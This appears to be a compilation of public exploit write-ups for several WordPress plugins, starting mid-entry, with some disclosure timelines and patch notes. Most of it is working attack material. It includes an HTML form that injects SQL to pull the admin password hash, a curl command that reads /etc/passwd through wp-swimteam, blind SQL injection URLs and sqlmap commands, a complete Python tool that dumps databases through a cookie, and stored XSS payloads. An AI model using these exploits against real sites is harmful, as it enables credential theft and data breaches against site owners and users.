Message ID must be one of your sended message (you can check this on user mailbox page -> sent items -> page source -> div id="this_is_message_id" class="mail_item mail_item_unread")

<form method="post" action="http://wordpress-instalation/wp-content/plugins/wp-symposium/ajax/mail_functions.php">
    <input type="hidden" name="action" value="getMailMessage">
    Message ID: <input type="text" name="mid"><br />
    SQL: <input type="text" name="tray" value="in_deleted = 1 UNION (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- ">
    <input type="submit" value="Inject">
</form>

Returned value will be between "[split]YOUR_RETURNED_VALUE[split]"
  
3. Solution:
  
Update to version 14.11
http://www.wpsymposium.com/2014/11/release-information-for-v14-11/
https://downloads.wordpress.org/plugin/wp-symposium.14.11.zip
HireHackking 
Title: Remote file download vulnerability in Wordpress Plugin wp-swimteam v1.44.10777
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-02
Download Site: https://wordpress.org/plugins/wp-swimteam
Vendor: Mike Walsh www.MichaelWalsh.org
Vendor Notified: 2015-07-02, fixed in v1.45beta3
Vendor Contact: Through website
Advisory: http://www.vapid.dhs.org/advisory.php?v=134
Description: Swim Team (aka wp-SwimTeam) is a comprehensive WordPress plugin to run a swim team including registration, volunteer assignments, scheduling, and much more.
Vulnerability:
The code in ./wp-swimteam/include/user/download.php doesn't sanitize user input from downloading sensitive system files:


 50             $file = urldecode($args['file']) ;
 51             $fh = fopen($file, 'r') or die('Unable to load file, something bad has happened.') ;
 52 
 53             while (!feof($fh))
 54                 $txt .= fread($fh, 1024) ;
 55 
 56             //  Clean up the temporary file - permissions
 57             //  may prevent this from succeedeing so use the '@'
 58             //  to suppress any messages from PHP.
 59 
 60             @unlink($file) ;
 61         }
 62 
 63         $filename = urldecode($args['filename']) ;
 64         $contenttype = urldecode($args['contenttype']) ;
 65 
 66         // Tell browser to expect a text file of some sort (usually txt or csv)
 67 
 68         header(sprintf('Content-Type: application/%s', $contenttype)) ;
 69         header(sprintf('Content-disposition:  attachment; filename=%s', $filename)) ;
 70         print $txt ;

CVEID:
OSVDB:
Exploit Code:

  • $ curl "http://server/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress"
HireHackking 
#################################################################
# Exploit Title : Wordpress Survey and poll Blind SQL Injection

# Data : 2015 – 02 - 11

# Exploit Author : Securely (Yoo Hee man)

# Plugin : WordPress Survey and Poll

# Vender Homepage : http://modalsurvey.sympies.com

# Tested On : Windows XP / sqlmap_v1.0

# Software Link : https://downloads.wordpress.org/plugin/wp-survey-and-poll.1.1.zip
                  https://downlaods.wordpress.org/plugin/wp-survey-and-poll.zip (latest version v.1.1.7 By February 11, 2015 based on)

1. Detail 
- This Plugin is passes ajax_survey function as [admin-ajax.php] a form of action and processes them in the /wp-survey-and-poll/settings.php
- Settings.php file is no login cookie check
- "survey_id" variable is not sanitized


#################################################################
public function ajax_survey()
    {
		global $wpdb;
		$survey_id = "";
		$survey_name = "";
		$survey_start_time = "";
		$survey_expiry_time = "";
		$survey_global = "";
		if (isset($_REQUEST['survey_id'])) $survey_id = sanitize_text_field($_REQUEST['survey_id']);
		else $survey_id = "";
		if (isset($_REQUEST['survey_name'])) sanitize_text_field($survey_name = $_REQUEST['survey_name']);
		else $survey_name = "";
		if (isset($_REQUEST['start_time'])&&(!empty($_REQUEST['start_time']))) $survey_start_time = $this->get_datetime_date(sanitize_text_field($_REQUEST['start_time']));
		else $survey_start_time = "";
		if (isset($_REQUEST['expiry_time'])&&(!empty($_REQUEST['expiry_time']))) $survey_expiry_time = $this->get_datetime_date(sanitize_text_field($_REQUEST['expiry_time']));
		else $survey_expiry_time = "";
		if (isset($_REQUEST['global_use'])) $survey_global = sanitize_text_field($_REQUEST['global_use']);
		else $survey_global = "";
		if (isset($_REQUEST['options'])) $survey_options = sanitize_text_field($_REQUEST['options']);
		else $survey_options = "";
		if (isset($_REQUEST['qa'])) $survey_qa = sanitize_text_field($_REQUEST['qa']);
		else $survey_qa = "";
		$survey_check = $wpdb->get_var("SELECT COUNT(*) FROM ".$wpdb->prefix."wp_sap_surveys WHERE `id` = ".$survey_id);
		if ($_REQUEST['sspcmd']=="save")
		{
		if ($survey_check>0) {
		//update survey
			$wpdb->update( $wpdb->prefix."wp_sap_surveys", array( "options" => $survey_options, "start_time" => $survey_start_time, 'expiry_time' => $survey_expiry_time, 'global' => $survey_global),array('id' => $survey_id));
			$wpdb->query($wpdb->prepare("DELETE FROM ".$wpdb->prefix."wp_sap_questions WHERE `survey_id` = %d",$survey_id));
			$wpdb->query($wpdb->prepare("DELETE FROM ".$wpdb->prefix."wp_sap_answers WHERE `survey_id` = %d",$survey_id));
				$qa_object = (array)json_decode(stripslashes($survey_qa));
				$qa_array = (array)$qa_object;
				foreach($qa_array as $keyq=>$qr)
				{
					foreach($qr as $key=>$oa)
					{
						if ($key==0)
						{
						$wpdb->insert( $wpdb->prefix."wp_sap_questions", array( 
							'id' => ($keyq+1), 
							'survey_id' => $survey_id, 
							'question' => $oa
							) );
							$qid = $wpdb->insert_id;
						}
						else
						{
						$oans = explode("->",$oa);
						$wpdb->insert( $wpdb->prefix."wp_sap_answers", array( 
							'survey_id' => $survey_id, 
							'question_id' => ($keyq+1),
							'answer' => $oans[0],
							'count' => $oans[1],
							'autoid' => $key
							) );					
						}
					
					}
				}
			die("updated");
		}
		else {
		//insert survey
			$wpdb->insert( $wpdb->prefix."wp_sap_surveys", array( 
				'id' => $survey_id, 
				'name' => $survey_name, 
				'options' => $survey_options, 
				'start_time' => $survey_start_time,
				'expiry_time'=> $survey_expiry_time,
				'global'=> $survey_global
				) );
				$qa_object = (array)json_decode(stripslashes($survey_qa));
				$qa_array = (array)$qa_object;
				foreach($qa_array as $keyq=>$qr)
				{
					foreach($qr as $key=>$oa)
					{
						if ($key==0)
						{
						$wpdb->insert( $wpdb->prefix."wp_sap_questions", array( 
							'id' => ($keyq+1), 
							'survey_id' => $survey_id, 
							'question' => $oa
							) );
							$qid = $wpdb->insert_id;
						}
						else
						{
						$oans = explode("->",$oa);
						$wpdb->insert( $wpdb->prefix."wp_sap_answers", array( 
							'survey_id' => $survey_id, 
							'question_id' => ($keyq+1),
							'answer' => $oans[0],
							'autoid' => $key
							) );					
						}
					
					}
				}
			die('success');
		}
################################################################

2. POC
- http://[target]/wp-admin/admin-ajax.php?action=ajax_survey&sspcmd=save&survey_id=3556498 [SQLi]
- DataBase() => "http://[target]/wp-admin/admin-ajax.php?action=ajax_survey&sspcmd=save&survey_id= 3556498 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),3,1))>[Numbers compare]

3. Sqlmap
- sqlmap -u "http://[target]/wp-admin/admin-ajax.php?action=ajax_survey&sspcmd=save&survey_id=3556498" -p survey_id --dbms=mysql


3. Solution:
Not patched

4. Discovered By : Securely(Yoo Hee man)
                   god2zuzu@naver.com
HireHackking 
# Exploit Title: WordPress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection (2)
# Date: 2021-09-07
# Exploit Author: Mohin Paramasivam (Shad0wQu35t)
# Vendor Homepage: http://modalsurvey.pantherius.com/
# Software Link: https://downloads.wordpress.org/plugin/wp-survey-and-poll.zip
# Version: 1.5.7.3
# Tested on: MariaDB,MYSQL

#!/usr/bin/python3

import requests
import re
import warnings
from bs4 import BeautifulSoup, CData
import sys
import argparse
import os
import time
from termcolor import colored
import validators

#Install all the requirements

"""
pip3 install requests
pip3 install bs4
pip3 install argparse
pip3 install termcolor
pip3 install validators

"""


parser = argparse.ArgumentParser(description='WP Plugin Survey & Poll V1.5.7.3 SQL Injection (sss_params)')
parser.add_argument('-u',help='Poll & Survey page URL')
args = parser.parse_args()

url = args.u


if len(sys.argv) !=3:
    parser.print_help(sys.stderr)
    sys.exit()

if not validators.url(url):
	print(colored("\r\nEnter URL with http:// or https://\r\n",'red'))
	parser.print_help(sys.stderr)
	sys.exit()


def currect_db_name():
	payload= """["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,database(),11#"]"""
	inject(payload)


def db_version():
	payload = """["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"]"""
	inject(payload)


def hostname():
	payload = """["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@hostname,11#"]"""
	inject(payload)


def current_user():
	payload = """["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,user(),11#"]"""
	inject(payload)


def list_databases():
	payload = """["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,group_concat(schema_name),11 from information_schema.schemata#"]"""
	inject(payload)

def list_tables_db():
	db = input("\r\nDatabase : ")
	payload = """["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,group_concat(table_name),11 from information_schema.tables where table_schema='%s'#"]""" %(db)
	inject(payload)	


def list_columns_db():
	db = input("\r\nDatabase : ")
	table = input("Table : ")
	payload = """["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,group_concat(column_name),11 from information_schema.columns where table_schema='%s' and table_name='%s'#"]""" %(db,table)
	inject(payload)	


def dump_db():
	db = input("\r\nDatabase: ")
	table = input("Table: ")
	column = input("Columns Eg: users,password : ")
	dump = "%s.%s" %(db,table)
	payload = """["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,group_concat(%s),11 from %s.%s#"]""" %(column,db,table)
	inject(payload)	


def custom_payload():
	payload = input("\r\nPayload : ")
	inject(payload)

def inject(inject_payload):

	request = requests.Session()

	cookies = {
		    'wp_sap': inject_payload,
		    
		}
	print("\r\n"+colored("Sending Payload :",'red')+" %s\r\n" %colored((inject_payload),'green'))
	response = request.get(url,cookies=cookies)
	warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
	soup = BeautifulSoup(response.text,features="lxml")
	cdata = soup.find(text=re.compile("CDATA"))
	split_cdata = list(cdata.split(':'))
	output = split_cdata[11]
	print("\r\n"+colored("SQLI OUTPUT :",'red')+" %s\r\n" %colored((output),'green'))
	time.sleep(1)
	main()



def main():
	print ("Automated SQL Injector (wp-survey-and-poll)")
	print ("Enter the respective number to select option")
	print ("#EXAMPLE Option : 1\r\n")



	print("Option 1 : Grab Database Version")
	print("Option 2 : Get Current Database Name")
	print("Option 3 : Get Hostname ")
	print("Option 4 : Get Current User")
	print("Option 5 : List All Databases")
	print("Option 6 : List Tables From Database")
	print("Option 7 : List Columns from Tables")
	print("Option 8 : Dump Database")
	print("Option 9 : Custom Payload")
	print("Option 10 : Exit")


	print("\r\n")
	option_selected = str(input("Select Option : "))


	if(option_selected=="1"):
		db_version()

	if(option_selected=="2"):
		currect_db_name()

	if(option_selected=="3"):
		hostname()

	if(option_selected=="4"):
		current_user()

	if(option_selected=="5"):
		list_databases()

	if(option_selected=="6"):
		list_tables_db()

	if(option_selected=="7"):
		list_columns_db()

	if(option_selected=="8"):
		dump_db()

	if(option_selected=="9"):
		custom_payload()

	if(option_selected=="10"):
		sys.exit()
	
	else:
		main()

main()
HireHackking 
# Exploit Title: Wordpress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection
# Date: 2018-09-09
# Exploit Author: Ceylan Bozogullarindan
# Vendor Homepage: http://modalsurvey.pantherius.com/
# Software Link: https://downloads.wordpress.org/plugin/wp-survey-and-poll.zip
# Version: 1.5.7.3
# Tested on: Windows 10
# CVE: N\A

# Description
# The vulnerability allows an attacker to inject sql commands using a value of a cookie parameter. 

# PoC
# Step 1. When you visit a page which has a poll or survey, a question will be appeared for answering.
# Answer that question.
# Step 2. When you answer the question, wp_sap will be assigned to a value. Open a cookie manager, 
# and change it with the payload showed below;

["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"]

# It is important that the "OR" statement must be 1=2. Because, application is reflecting the first result 
# of the query. When you make it 1=1, you should see a question from firt record. 
# Therefore OR statement must be returned False.

# Step 3. Reload the page. Open the source code of the page. Search "sss_params". 
# You will see the version of DB in value of sss_params parameter. 

# The Request

Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: wp_sap=["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"]	
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

# The result from source code of the page

<script type='text/javascript'>
/* <![CDATA[ */
var sss_params = {"survey_options":"{\"options\":\"[\\\"center\\\",\\\"easeInOutBack\\\",\\\"\\\",\\\"-webkit-linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);-moz-linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);-ms-linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);-o-linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);\\\",\\\"rgb(0, 0, 0)\\\",\\\"rgb(93, 93, 93)\\\",\\\"1\\\",\\\"5\\\",\\\"12\\\",\\\"10\\\",\\\"12\\\",500,\\\"Thank you for your feedback!\\\",\\\"0\\\",\\\"0\\\",\\\"0\\\"]\",\"plugin_url\":\"http:\\\/\\\/www.*****.com\\\/wp-content\\\/plugins\\\/wp-survey-and-poll\",\"admin_url\":\"http:\\\/\\\/www.******.com\\\/wp-admin\\\/admin-ajax.php\",\"survey_id\":\"1101225978\",\"style\":\"modal\",\"expired\":\"false\",\"debug\":\"true\",\"questions\":[[\"Are You A First Time Home Buyer?\",\"Yes\",\"No\"],[\>>>>>>"10.1.36-MariaDB-1~trusty\"<<<<<<<]]}"};
/* ]]> */
</script>

DB version: "10.1.36-MariaDB-1~trusty"....
HireHackking 
# Exploit Title: WordPress Plugin Supsystic Ultimate Maps 1.1.12 - 'sidx' SQL injection
# Date: 24/07/2020
# Exploit Author: Erik David Martin
# Vendor Homepage: https://supsystic.com/
# Software Link: https://downloads.wordpress.org/plugin/ultimate-maps-by-supsystic.1.1.12.zip
# Category: Web Application
# Version: 1.1.12
# Tested on: 16.04.6 LTS / WordPress 5.4.2

# 25/07 2020: Vendor notified
# 27/07 2020: Vendor requested detailed information
# 27/07 2020: Information provided
# 07/08 2020: Nudged vendor. No reply
# 22/08 2020: Nudged vendor. No reply
# 04/10 2020: Nudged vendor. No reply
# 29/11 2020: WordPress Plugin Security team contacted
# 09/12 2020: Vulnerability fixed

# 1. Description

The GET parameter "sidx" does not sanitize user input when searching for existing maps.

# 2. Proof of Concept (PoC)

Use ZAP/Burp to capture the web request when searching for existing maps and save it to request.txt
Referer: http://192.168.0.49/wp-admin/admin.php?page=ultimate-maps-supsystic

sqlmap -r request.txt --dbms=mysql -p sidx

Parameter: sidx (GET)
	Type: boolean-based blind
	Payload: mod=maps&action=getListForTbl&pl=ums&reqType=ajax&search[text_like]=t&_search=false&nd=1595781611306&rows=10&page=1&sidx=(SELECT (CASE WHEN (7084=7084) THEN 0x6964 ELSE (SELECT 3932 UNION SELECT 2499) END))&sord=desc

	Type: time-based blind
	Payload: mod=maps&action=getListForTbl&pl=ums&reqType=ajax&search[text_like]=t&_search=false&nd=1595781611306&rows=10&page=1&sidx=id AND (SELECT 9735 FROM (SELECT(SLEEP(5)))AJAb)&sord=desc
HireHackking 
# Exploit Title: WordPress Plugin Supsystic Pricing Table 1.8.7 - Multiple Vulnerabilities
# Date: 24/07/2020
# Exploit Author: Erik David Martin
# Vendor Homepage: https://supsystic.com/
# Software Link: https://downloads.wordpress.org/plugin/pricing-table-by-supsystic.1.8.7.zip
# Version: 1.8.7 and 1.8.6 
# Tested on: Ubuntu 16.04.6 LTS / WordPress 5.4.2

# 25/07 2020: Vendor notified
# 27/07 2020: Vendor requested detailed information
# 27/07 2020: Information provided
# 07/08 2020: Nudged vendor. No reply
# 22/08 2020: Nudged vendor. No reply
# 04/10 2020: Nudged vendor. No reply
# 29/11 2020: WordPress Plugin Security team contacted
# 07/12 2020: Vulnerability patched


##################################
			   SQLi
##################################


# 1. Description

The GET parameter "sidx" does not sanitize user input when searching for existing pricing tables.


# 2. Proof of Concept (PoC)

Use ZAP/Burp to capture the web request when searching for existing pricing tables and save it to request.txt
Referer: http://192.168.0.49/wp-admin/admin.php?page=supsystic-tables&module=tables

sqlmap -r request.txt --dbms=mysql -p sidx

Parameter: sidx (GET)
    Type: boolean-based blind
    Payload: mod=tables&action=getListForTbl&pl=pts&reqType=ajax&pts_nonce=2893fe633b&search[text_like]=test&_search=false&nd=1595624411398&rows=10&page=0&sidx=(SELECT (CASE WHEN (5313=5313) THEN 0x6964 ELSE (SELECT 9338 UNION SELECT 5490) END))&sord=desc

    Type: time-based blind
    Payload: mod=tables&action=getListForTbl&pl=pts&reqType=ajax&pts_nonce=2893fe633b&search[text_like]=test&_search=false&nd=1595624411398&rows=10&page=0&sidx=id AND (SELECT 9475 FROM (SELECT(SLEEP(5)))OjhB)&sord=desc



##################################
			Stored XSS
##################################


# 1. Description

The "Edit name" and "Edit HTML" features are vulnerable to stored XXS.
Location: http://192.168.0.49/wp-admin/admin.php?page=tables-supsystic&tab=tables_edit&id=[TABLE ID]


# 2. Proof of Concept (PoC)

Enter the following payload into the "Edit" field in the top left corner: "><script>alert(1)</script><!--'
The payload will execute when viewing the pricing table itself, and also in the "Show All Tables" section.
Enter the following payload into the "Edit HTML" section in the top right corner:	<script>alert(1)</script><!--
The payload will get stored and will execute everytime the user attempts to view the pricing table.